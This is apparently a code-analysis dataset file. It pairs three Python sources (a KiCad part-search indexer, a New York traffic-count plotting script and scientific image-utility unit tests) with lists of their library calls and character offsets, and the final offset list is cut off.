#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import os.path
from whoosh import index
from whoosh.fields import Schema, ID, TEXT, NUMERIC
from whoosh.analysis import StemmingAnalyzer
from .kicadsearch_parser import LibDocCreator, ModDocCreator, KicadModDocCreator
def list_files(rootdirs, sufix):
for rootdir in rootdirs:
for root, dirs, files in os.walk(rootdir):
for path in [root + os.path.sep + file for file in files
if file.lower().endswith(sufix)]:
print(path)
yield path
class KicadIndexer(object):
def __init__(self):
pass
def create_index(self, indexdir, librarydirs, moduledirs, encoding):
if not os.path.exists(indexdir):
os.mkdir(indexdir)
schema = Schema(id=ID(stored=True),
type=TEXT(stored=True),
name=TEXT(stored=True),
descr=TEXT(stored=True, analyzer=StemmingAnalyzer()),
keyword=TEXT(stored=True, analyzer=StemmingAnalyzer()),
reference=TEXT(stored=True),
md5sum=TEXT(stored=True),
path=TEXT(stored=True),
position=NUMERIC(stored=True),
lineno=NUMERIC(stored=True),
lines=NUMERIC(stored=True),
path2=TEXT(stored=True),
position2=NUMERIC(stored=True),
lineno2=NUMERIC(stored=True),
lines2=NUMERIC(stored=True), )
ix = index.create_in(indexdir, schema)
writer = ix.writer()
for path in list_files(librarydirs, '.lib'):
for doc in LibDocCreator(path, encoding).create():
writer.add_document(**doc)
for path in list_files(moduledirs, '.mod'):
for doc in ModDocCreator(path, encoding).create():
writer.add_document(**doc)
for path in list_files(moduledirs, '.kicad_mod'):
for doc in KicadModDocCreator(path, encoding).create():
writer.add_document(**doc)
writer.commit()
searcher = ix.searcher()
count = searcher.doc_count()
searcher.close()
ix.close()
return count
|
[
"os.mkdir",
"whoosh.fields.ID",
"whoosh.fields.TEXT",
"whoosh.analysis.StemmingAnalyzer",
"os.walk",
"os.path.exists",
"whoosh.fields.NUMERIC",
"whoosh.index.create_in"
] |
[((368, 384), 'os.walk', 'os.walk', (['rootdir'], {}), '(rootdir)\n', (375, 384), False, 'import os\n'), ((1620, 1653), 'whoosh.index.create_in', 'index.create_in', (['indexdir', 'schema'], {}), '(indexdir, schema)\n', (1635, 1653), False, 'from whoosh import index\n'), ((725, 749), 'os.path.exists', 'os.path.exists', (['indexdir'], {}), '(indexdir)\n', (739, 749), False, 'import os\n'), ((763, 781), 'os.mkdir', 'os.mkdir', (['indexdir'], {}), '(indexdir)\n', (771, 781), False, 'import os\n'), ((810, 825), 'whoosh.fields.ID', 'ID', ([], {'stored': '(True)'}), '(stored=True)\n', (812, 825), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((856, 873), 'whoosh.fields.TEXT', 'TEXT', ([], {'stored': '(True)'}), '(stored=True)\n', (860, 873), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((904, 921), 'whoosh.fields.TEXT', 'TEXT', ([], {'stored': '(True)'}), '(stored=True)\n', (908, 921), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((1115, 1132), 'whoosh.fields.TEXT', 'TEXT', ([], {'stored': '(True)'}), '(stored=True)\n', (1119, 1132), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((1165, 1182), 'whoosh.fields.TEXT', 'TEXT', ([], {'stored': '(True)'}), '(stored=True)\n', (1169, 1182), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((1213, 1230), 'whoosh.fields.TEXT', 'TEXT', ([], {'stored': '(True)'}), '(stored=True)\n', (1217, 1230), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((1265, 1285), 'whoosh.fields.NUMERIC', 'NUMERIC', ([], {'stored': '(True)'}), '(stored=True)\n', (1272, 1285), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((1318, 1338), 'whoosh.fields.NUMERIC', 'NUMERIC', ([], {'stored': '(True)'}), '(stored=True)\n', (1325, 1338), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((1370, 1390), 'whoosh.fields.NUMERIC', 'NUMERIC', ([], {'stored': '(True)'}), '(stored=True)\n', (1377, 1390), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((1422, 1439), 'whoosh.fields.TEXT', 'TEXT', ([], {'stored': '(True)'}), '(stored=True)\n', (1426, 1439), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((1475, 1495), 'whoosh.fields.NUMERIC', 'NUMERIC', ([], {'stored': '(True)'}), '(stored=True)\n', (1482, 1495), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((1529, 1549), 'whoosh.fields.NUMERIC', 'NUMERIC', ([], {'stored': '(True)'}), '(stored=True)\n', (1536, 1549), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((1582, 1602), 'whoosh.fields.NUMERIC', 'NUMERIC', ([], {'stored': '(True)'}), '(stored=True)\n', (1589, 1602), False, 'from whoosh.fields import Schema, ID, TEXT, NUMERIC\n'), ((980, 998), 'whoosh.analysis.StemmingAnalyzer', 'StemmingAnalyzer', ([], {}), '()\n', (996, 998), False, 'from whoosh.analysis import StemmingAnalyzer\n'), ((1060, 1078), 'whoosh.analysis.StemmingAnalyzer', 'StemmingAnalyzer', ([], {}), '()\n', (1076, 1078), False, 'from whoosh.analysis import StemmingAnalyzer\n')]
|
#!/usr/bin/env python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import re
gis_file = 'Annual_Average_Daily_Traffic__AADT___Beginning_1977.csv'
df = pd.read_csv(gis_file)
print(df.head())
# remove spaces from column names
cols = df.columns
cols = cols.map(lambda x: x.replace(' ', '_') if isinstance(x, (str, unicode)) else x)
df.columns = cols
print(df.columns)
# Delete the columns we don't care about
df = df.drop(['RC_ID', 'GIS_Code'], axis=1)
# Aggregations
# Find total by year
df_grouped_year = df.groupby(df.Year)
print(df_grouped_year)
df_total_grouped_year = df_grouped_year.sum()
print(df_total_grouped_year)
df_total_grouped_year = df_grouped_year.aggregate({'AADT': np.sum})
print(df_total_grouped_year)
print(df_total_grouped_year.columns)
municipalities = ['NEW YORK CITY', 'TROY', 'CROTON-ON-HUDSON']
df_grouped_muni = df.loc[df.Municipality.isin(municipalities)]
df_total_muni_aadt_grouped = df_grouped_muni.groupby(['Year'])
df_total_muni_aadt = df_total_muni_aadt_grouped.agg({'AADT': np.sum})
print(df_total_muni_aadt.columns)
print(df_total_muni_aadt.head())
exclude_cols = ['Region', 'Begin_Milepoint', 'End_Milepoint']
df_total_muni_aadt.ix[:, df_total_muni_aadt.columns.difference(exclude_cols)].plot(kind='bar')
plt.legend(loc='best').get_texts()[0].set_text('Annual Average Daily Traffic for {}'.format(', '.join(map(str,municipalities))))
file_name = 'AADT_{}'.format('_'.join(map(str,municipalities)))
file_name = re.sub('\s+','_',file_name)
plt.savefig(file_name)
plt.show()
|
[
"matplotlib.pyplot.show",
"pandas.read_csv",
"matplotlib.pyplot.legend",
"re.sub",
"matplotlib.pyplot.savefig"
] |
[((180, 201), 'pandas.read_csv', 'pd.read_csv', (['gis_file'], {}), '(gis_file)\n', (191, 201), True, 'import pandas as pd\n'), ((1485, 1515), 're.sub', 're.sub', (['"""\\\\s+"""', '"""_"""', 'file_name'], {}), "('\\\\s+', '_', file_name)\n", (1491, 1515), False, 'import re\n'), ((1513, 1535), 'matplotlib.pyplot.savefig', 'plt.savefig', (['file_name'], {}), '(file_name)\n', (1524, 1535), True, 'import matplotlib.pyplot as plt\n'), ((1536, 1546), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1544, 1546), True, 'import matplotlib.pyplot as plt\n'), ((1279, 1301), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""best"""'}), "(loc='best')\n", (1289, 1301), True, 'import matplotlib.pyplot as plt\n')]
|
import os.path
from unittest import TestCase
import numpy as np
from aspire.utils import (
Rotation,
crop_pad_2d,
get_aligned_rotations,
grid_2d,
grid_3d,
register_rotations,
uniform_random_angles,
)
DATA_DIR = os.path.join(os.path.dirname(__file__), "saved_test_data")
class UtilsTestCase(TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def testGrid2d(self):
# Note these reference files were created using Matlab compat grid indexing.
grid2d = grid_2d(8, indexing="xy")
self.assertTrue(
np.allclose(grid2d["x"], np.load(os.path.join(DATA_DIR, "grid2d_8_x.npy")))
)
self.assertTrue(
np.allclose(grid2d["y"], np.load(os.path.join(DATA_DIR, "grid2d_8_y.npy")))
)
self.assertTrue(
np.allclose(grid2d["r"], np.load(os.path.join(DATA_DIR, "grid2d_8_r.npy")))
)
self.assertTrue(
np.allclose(
grid2d["phi"], np.load(os.path.join(DATA_DIR, "grid2d_8_phi.npy"))
)
)
def testGrid3d(self):
# Note these reference files were created using Matlab compat grid indexing.
grid3d = grid_3d(8, indexing="xyz")
self.assertTrue(
np.allclose(grid3d["x"], np.load(os.path.join(DATA_DIR, "grid3d_8_x.npy")))
)
self.assertTrue(
np.allclose(grid3d["y"], np.load(os.path.join(DATA_DIR, "grid3d_8_y.npy")))
)
self.assertTrue(
np.allclose(grid3d["z"], np.load(os.path.join(DATA_DIR, "grid3d_8_z.npy")))
)
self.assertTrue(
np.allclose(grid3d["r"], np.load(os.path.join(DATA_DIR, "grid3d_8_r.npy")))
)
self.assertTrue(
np.allclose(
grid3d["phi"], np.load(os.path.join(DATA_DIR, "grid3d_8_phi.npy"))
)
)
self.assertTrue(
np.allclose(
grid3d["theta"], np.load(os.path.join(DATA_DIR, "grid3d_8_theta.npy"))
)
)
def testRegisterRots(self):
angles = uniform_random_angles(32, seed=0)
rots_ref = Rotation.from_euler(angles).matrices
q_ang = [[np.pi / 4, np.pi / 4, np.pi / 4]]
q_mat = Rotation.from_euler(q_ang).matrices[0]
flag = 0
regrots_ref = get_aligned_rotations(rots_ref, q_mat, flag)
q_mat_est, flag_est = register_rotations(rots_ref, regrots_ref)
self.assertTrue(np.allclose(flag_est, flag) and np.allclose(q_mat_est, q_mat))
def testSquareCrop2D(self):
# Test even/odd cases based on the convention that the center of a sequence of length n
# is (n+1)/2 if n is odd and n/2 + 1 if even.
# Cropping is done to keep the center of the sequence the same value before and after.
# Therefore the following apply:
# Cropping even to odd will result in the 0-index (beginning)
# of the sequence being chopped off (x marks the center, ~ marks deleted data):
# ---x-- => ~--x--
# Cropping odd to even will result in the -1-index (end)
# of the sequence being chopped off:
# ---x--- => ---x--~
# even to even
a = np.diag(np.arange(8))
test_a = np.diag(np.arange(1, 7))
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 6)))
# even to odd
# the extra row/column cut off are the top and left
# due to the centering convention
a = np.diag(np.arange(8))
test_a = np.diag(np.arange(1, 8))
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 7)))
# odd to odd
a = np.diag(np.arange(9))
test_a = np.diag(np.arange(1, 8))
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 7)))
# odd to even
# the extra row/column cut off are the bottom and right
# due to the centering convention
a = np.diag(np.arange(9))
test_a = np.diag(np.arange(8))
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 8)))
def testSquarePad2D(self):
# Test even/odd cases based on the convention that the center of a sequence of length n
# is (n+1)/2 if n is odd and n/2 + 1 if even.
# Padding is done to keep the center of the sequence the same value before and after.
# Therefore the following apply:
# Padding from even to odd results in the spare padding being added to the -1-index (end)
# of the sequence (x represents the center, + represents padding):
# ---x-- => ---x--+
# Padding from odd to even results in the spare padding being added to the 0-index (beginning)
# of the sequence:
# --x-- => +--x--
# even to even
a = np.diag(np.arange(1, 9))
test_a = np.diag([0, 1, 2, 3, 4, 5, 6, 7, 8, 0])
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 10)))
# even to odd
# the extra padding is to the bottom and right
# due to the centering convention
a = np.diag(np.arange(1, 9))
test_a = np.diag([0, 1, 2, 3, 4, 5, 6, 7, 8, 0, 0])
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 11)))
# odd to odd
a = np.diag(np.arange(1, 10))
test_a = np.diag([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 11)))
# odd to even
# the extra padding is to the top and left
# due to the centering convention
a = np.diag(np.arange(1, 10))
test_a = np.diag([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 10)))
def testRectCrop2D(self):
# Additional sanity checks for rectangular cropping case
# 12x10 -> 10x10
a = np.diag(np.arange(1, 11))
# augment to 12 rows
aug = np.vstack([a, np.zeros(10)])
aug = np.vstack([np.zeros(10), aug])
# make sure the top and bottom rows are stripped
self.assertTrue(np.array_equal(a, crop_pad_2d(aug, 10)))
# 10x12 -> 10x10
a = np.diag(np.arange(1, 11))
# augment to 12 columns
aug = np.column_stack([a, np.zeros(10)])
aug = np.column_stack([np.zeros(10), aug])
# make sure the left and right columns are stripped
self.assertTrue(np.array_equal(a, crop_pad_2d(aug, 10)))
# 9x7 -> 7x7
a = np.diag(np.arange(1, 8))
# augment to 9 rows
aug = np.vstack([a, np.zeros(7)])
aug = np.vstack([np.zeros(7), aug])
# make sure the top and bottom rows are stripped
self.assertTrue(np.array_equal(a, crop_pad_2d(aug, 7)))
# 7x9 -> 7x7
a = np.diag(np.arange(1, 8))
# augment to 9 columns
aug = np.column_stack([a, np.zeros(7)])
aug = np.column_stack([np.zeros(7), aug])
# make sure the left and right columns are stripped
self.assertTrue(np.array_equal(a, crop_pad_2d(aug, 7)))
def testRectPad2D(self):
# Additional sanity checks for rectangular padding case
# 12x10 -> 12x12
a = np.diag(np.arange(1, 11))
# augment to 12 rows
aug = np.vstack([a, np.zeros(10)])
aug = np.vstack([np.zeros(10), aug])
# expected result
padded = np.column_stack([aug, np.zeros(12)])
padded = np.column_stack([np.zeros(12), padded])
# make sure columns of fill value (0) are added to the
# left and right
self.assertTrue(np.array_equal(padded, crop_pad_2d(aug, 12)))
# 10x12 -> 12x12
a = np.diag(np.arange(1, 11))
# augment to 12 columns
aug = np.column_stack([a, np.zeros(10)])
aug = np.column_stack([np.zeros(10), aug])
# expected result
padded = np.vstack([aug, np.zeros(12)])
padded = np.vstack([np.zeros(12), padded])
# make sure rows of fill value (0) are added to the
# top and bottom
self.assertTrue(np.array_equal(padded, crop_pad_2d(aug, 12)))
# 9x7 -> 9x9
a = np.diag(np.arange(1, 8))
# augment to 9 rows
aug = np.vstack([a, np.zeros(7)])
aug = np.vstack([np.zeros(7), aug])
# expected result
padded = np.column_stack([aug, np.zeros(9)])
padded = np.column_stack([np.zeros(9), padded])
# make sure columns of fill value (0) are added to the
# left and right
self.assertTrue(np.array_equal(padded, crop_pad_2d(aug, 9)))
# 7x9 -> 9x9
a = np.diag(np.arange(1, 8))
# augment to 9 columns
aug = np.column_stack([a, np.zeros(7)])
aug = np.column_stack([np.zeros(7), aug])
# expected result
padded = np.vstack([aug, np.zeros(9)])
padded = np.vstack([np.zeros(9), padded])
# make sure rows of fill value (0) are added to the
# top and bottom
self.assertTrue(np.array_equal(padded, crop_pad_2d(aug, 9)))
def testCropPad2DError(self):
with self.assertRaises(ValueError) as e:
_ = crop_pad_2d(np.zeros((6, 10)), 8)
self.assertTrue(
"Cannot crop and pad an image at the same time.", str(e.exception)
)
def testCrop2DDtype(self):
# crop_pad_2d must return an array of the same dtype it was given
# in particular, because the method is used for Fourier downsampling
# methods involving cropping complex arrays
self.assertEqual(
crop_pad_2d(np.eye(10).astype("complex"), 5).dtype, np.dtype("complex128")
)
def testCrop2DFillValue(self):
# make sure the fill value is as expected
# we are padding from an odd to an even dimension
# so the padded column is added to the left
a = np.ones((4, 3))
b = crop_pad_2d(a, 4, fill_value=-1)
self.assertTrue(np.array_equal(b[:, 0], np.array([-1, -1, -1, -1])))
|
[
"aspire.utils.Rotation.from_euler",
"aspire.utils.grid_2d",
"numpy.eye",
"aspire.utils.get_aligned_rotations",
"numpy.allclose",
"aspire.utils.crop_pad_2d",
"numpy.dtype",
"numpy.ones",
"numpy.zeros",
"aspire.utils.uniform_random_angles",
"numpy.arange",
"numpy.array",
"aspire.utils.register_rotations",
"numpy.diag",
"aspire.utils.grid_3d"
] |
[((535, 560), 'aspire.utils.grid_2d', 'grid_2d', (['(8)'], {'indexing': '"""xy"""'}), "(8, indexing='xy')\n", (542, 560), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((1216, 1242), 'aspire.utils.grid_3d', 'grid_3d', (['(8)'], {'indexing': '"""xyz"""'}), "(8, indexing='xyz')\n", (1223, 1242), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((2103, 2136), 'aspire.utils.uniform_random_angles', 'uniform_random_angles', (['(32)'], {'seed': '(0)'}), '(32, seed=0)\n', (2124, 2136), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((2340, 2384), 'aspire.utils.get_aligned_rotations', 'get_aligned_rotations', (['rots_ref', 'q_mat', 'flag'], {}), '(rots_ref, q_mat, flag)\n', (2361, 2384), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((2415, 2456), 'aspire.utils.register_rotations', 'register_rotations', (['rots_ref', 'regrots_ref'], {}), '(rots_ref, regrots_ref)\n', (2433, 2456), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((4809, 4848), 'numpy.diag', 'np.diag', (['[0, 1, 2, 3, 4, 5, 6, 7, 8, 0]'], {}), '([0, 1, 2, 3, 4, 5, 6, 7, 8, 0])\n', (4816, 4848), True, 'import numpy as np\n'), ((5091, 5133), 'numpy.diag', 'np.diag', (['[0, 1, 2, 3, 4, 5, 6, 7, 8, 0, 0]'], {}), '([0, 1, 2, 3, 4, 5, 6, 7, 8, 0, 0])\n', (5098, 5133), True, 'import numpy as np\n'), ((5279, 5321), 'numpy.diag', 'np.diag', (['[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0]'], {}), '([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0])\n', (5286, 5321), True, 'import numpy as np\n'), ((5561, 5600), 'numpy.diag', 'np.diag', (['[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]'], {}), '([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\n', (5568, 5600), True, 'import numpy as np\n'), ((9797, 9812), 'numpy.ones', 'np.ones', (['(4, 3)'], {}), '((4, 3))\n', (9804, 9812), True, 'import numpy as np\n'), ((9825, 9857), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['a', '(4)'], {'fill_value': '(-1)'}), '(a, 4, fill_value=-1)\n', (9836, 9857), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((2156, 2183), 'aspire.utils.Rotation.from_euler', 'Rotation.from_euler', (['angles'], {}), '(angles)\n', (2175, 2183), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((3232, 3244), 'numpy.arange', 'np.arange', (['(8)'], {}), '(8)\n', (3241, 3244), True, 'import numpy as np\n'), ((3271, 3286), 'numpy.arange', 'np.arange', (['(1)', '(7)'], {}), '(1, 7)\n', (3280, 3286), True, 'import numpy as np\n'), ((3500, 3512), 'numpy.arange', 'np.arange', (['(8)'], {}), '(8)\n', (3509, 3512), True, 'import numpy as np\n'), ((3539, 3554), 'numpy.arange', 'np.arange', (['(1)', '(8)'], {}), '(1, 8)\n', (3548, 3554), True, 'import numpy as np\n'), ((3665, 3677), 'numpy.arange', 'np.arange', (['(9)'], {}), '(9)\n', (3674, 3677), True, 'import numpy as np\n'), ((3704, 3719), 'numpy.arange', 'np.arange', (['(1)', '(8)'], {}), '(1, 8)\n', (3713, 3719), True, 'import numpy as np\n'), ((3937, 3949), 'numpy.arange', 'np.arange', (['(9)'], {}), '(9)\n', (3946, 3949), True, 'import numpy as np\n'), ((3976, 3988), 'numpy.arange', 'np.arange', (['(8)'], {}), '(8)\n', (3985, 3988), True, 'import numpy as np\n'), ((4775, 4790), 'numpy.arange', 'np.arange', (['(1)', '(9)'], {}), '(1, 9)\n', (4784, 4790), True, 'import numpy as np\n'), ((5057, 5072), 'numpy.arange', 'np.arange', (['(1)', '(9)'], {}), '(1, 9)\n', (5066, 5072), True, 'import numpy as np\n'), ((5244, 5260), 'numpy.arange', 'np.arange', (['(1)', '(10)'], {}), '(1, 10)\n', (5253, 5260), True, 'import numpy as np\n'), ((5526, 5542), 'numpy.arange', 'np.arange', (['(1)', '(10)'], {}), '(1, 10)\n', (5535, 5542), True, 'import numpy as np\n'), ((5811, 5827), 'numpy.arange', 'np.arange', (['(1)', '(11)'], {}), '(1, 11)\n', (5820, 5827), True, 'import numpy as np\n'), ((6114, 6130), 'numpy.arange', 'np.arange', (['(1)', '(11)'], {}), '(1, 11)\n', (6123, 6130), True, 'import numpy as np\n'), ((6431, 6446), 'numpy.arange', 'np.arange', (['(1)', '(8)'], {}), '(1, 8)\n', (6440, 6446), True, 'import numpy as np\n'), ((6725, 6740), 'numpy.arange', 'np.arange', (['(1)', '(8)'], {}), '(1, 8)\n', (6734, 6740), True, 'import numpy as np\n'), ((7135, 7151), 'numpy.arange', 'np.arange', (['(1)', '(11)'], {}), '(1, 11)\n', (7144, 7151), True, 'import numpy as np\n'), ((7611, 7627), 'numpy.arange', 'np.arange', (['(1)', '(11)'], {}), '(1, 11)\n', (7620, 7627), True, 'import numpy as np\n'), ((8083, 8098), 'numpy.arange', 'np.arange', (['(1)', '(8)'], {}), '(1, 8)\n', (8092, 8098), True, 'import numpy as np\n'), ((8548, 8563), 'numpy.arange', 'np.arange', (['(1)', '(8)'], {}), '(1, 8)\n', (8557, 8563), True, 'import numpy as np\n'), ((9556, 9578), 'numpy.dtype', 'np.dtype', (['"""complex128"""'], {}), "('complex128')\n", (9564, 9578), True, 'import numpy as np\n'), ((2262, 2288), 'aspire.utils.Rotation.from_euler', 'Rotation.from_euler', (['q_ang'], {}), '(q_ang)\n', (2281, 2288), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((2482, 2509), 'numpy.allclose', 'np.allclose', (['flag_est', 'flag'], {}), '(flag_est, flag)\n', (2493, 2509), True, 'import numpy as np\n'), ((2514, 2543), 'numpy.allclose', 'np.allclose', (['q_mat_est', 'q_mat'], {}), '(q_mat_est, q_mat)\n', (2525, 2543), True, 'import numpy as np\n'), ((3335, 3352), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['a', '(6)'], {}), '(a, 6)\n', (3346, 3352), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((3603, 3620), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['a', '(7)'], {}), '(a, 7)\n', (3614, 3620), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((3768, 3785), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['a', '(7)'], {}), '(a, 7)\n', (3779, 3785), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((4037, 4054), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['a', '(8)'], {}), '(a, 8)\n', (4048, 4054), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((4896, 4914), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['a', '(10)'], {}), '(a, 10)\n', (4907, 4914), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((5181, 5199), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['a', '(11)'], {}), '(a, 11)\n', (5192, 5199), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((5369, 5387), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['a', '(11)'], {}), '(a, 11)\n', (5380, 5387), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((5648, 5666), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['a', '(10)'], {}), '(a, 10)\n', (5659, 5666), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((5886, 5898), 'numpy.zeros', 'np.zeros', (['(10)'], {}), '(10)\n', (5894, 5898), True, 'import numpy as np\n'), ((5926, 5938), 'numpy.zeros', 'np.zeros', (['(10)'], {}), '(10)\n', (5934, 5938), True, 'import numpy as np\n'), ((6045, 6065), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['aug', '(10)'], {}), '(aug, 10)\n', (6056, 6065), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((6198, 6210), 'numpy.zeros', 'np.zeros', (['(10)'], {}), '(10)\n', (6206, 6210), True, 'import numpy as np\n'), ((6244, 6256), 'numpy.zeros', 'np.zeros', (['(10)'], {}), '(10)\n', (6252, 6256), True, 'import numpy as np\n'), ((6366, 6386), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['aug', '(10)'], {}), '(aug, 10)\n', (6377, 6386), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((6504, 6515), 'numpy.zeros', 'np.zeros', (['(7)'], {}), '(7)\n', (6512, 6515), True, 'import numpy as np\n'), ((6543, 6554), 'numpy.zeros', 'np.zeros', (['(7)'], {}), '(7)\n', (6551, 6554), True, 'import numpy as np\n'), ((6661, 6680), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['aug', '(7)'], {}), '(aug, 7)\n', (6672, 6680), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((6807, 6818), 'numpy.zeros', 'np.zeros', (['(7)'], {}), '(7)\n', (6815, 6818), True, 'import numpy as np\n'), ((6852, 6863), 'numpy.zeros', 'np.zeros', (['(7)'], {}), '(7)\n', (6860, 6863), True, 'import numpy as np\n'), ((6973, 6992), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['aug', '(7)'], {}), '(aug, 7)\n', (6984, 6992), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((7210, 7222), 'numpy.zeros', 'np.zeros', (['(10)'], {}), '(10)\n', (7218, 7222), True, 'import numpy as np\n'), ((7250, 7262), 'numpy.zeros', 'np.zeros', (['(10)'], {}), '(10)\n', (7258, 7262), True, 'import numpy as np\n'), ((7335, 7347), 'numpy.zeros', 'np.zeros', (['(12)'], {}), '(12)\n', (7343, 7347), True, 'import numpy as np\n'), ((7384, 7396), 'numpy.zeros', 'np.zeros', (['(12)'], {}), '(12)\n', (7392, 7396), True, 'import numpy as np\n'), ((7542, 7562), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['aug', '(12)'], {}), '(aug, 12)\n', (7553, 7562), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((7695, 7707), 'numpy.zeros', 'np.zeros', (['(10)'], {}), '(10)\n', (7703, 7707), True, 'import numpy as np\n'), ((7741, 7753), 'numpy.zeros', 'np.zeros', (['(10)'], {}), '(10)\n', (7749, 7753), True, 'import numpy as np\n'), ((7820, 7832), 'numpy.zeros', 'np.zeros', (['(12)'], {}), '(12)\n', (7828, 7832), True, 'import numpy as np\n'), ((7863, 7875), 'numpy.zeros', 'np.zeros', (['(12)'], {}), '(12)\n', (7871, 7875), True, 'import numpy as np\n'), ((8018, 8038), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['aug', '(12)'], {}), '(aug, 12)\n', (8029, 8038), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((8156, 8167), 'numpy.zeros', 'np.zeros', (['(7)'], {}), '(7)\n', (8164, 8167), True, 'import numpy as np\n'), ((8195, 8206), 'numpy.zeros', 'np.zeros', (['(7)'], {}), '(7)\n', (8203, 8206), True, 'import numpy as np\n'), ((8279, 8290), 'numpy.zeros', 'np.zeros', (['(9)'], {}), '(9)\n', (8287, 8290), True, 'import numpy as np\n'), ((8327, 8338), 'numpy.zeros', 'np.zeros', (['(9)'], {}), '(9)\n', (8335, 8338), True, 'import numpy as np\n'), ((8484, 8503), 'aspire.utils.crop_pad_2d', 'crop_pad_2d', (['aug', '(9)'], {}), '(aug, 9)\n', (8495, 8503), False, 'from aspire.utils import Rotation, crop_pad_2d, get_aligned_rotations, grid_2d, grid_3d, register_rotations, uniform_random_angles\n'), ((8630, 8641), 'numpy.zeros', 'np.zeros', (['(7)'], {}), '(7)\n', (8638, 8641), True, 'import numpy as np\n'), ((8675, 8686), 'numpy.zeros', 'np.zeros', (['(7)'], {}), '(7)\n', (8683, 8686), True, 'import numpy as np\n'), ((8753, 8764), 'numpy.zeros', 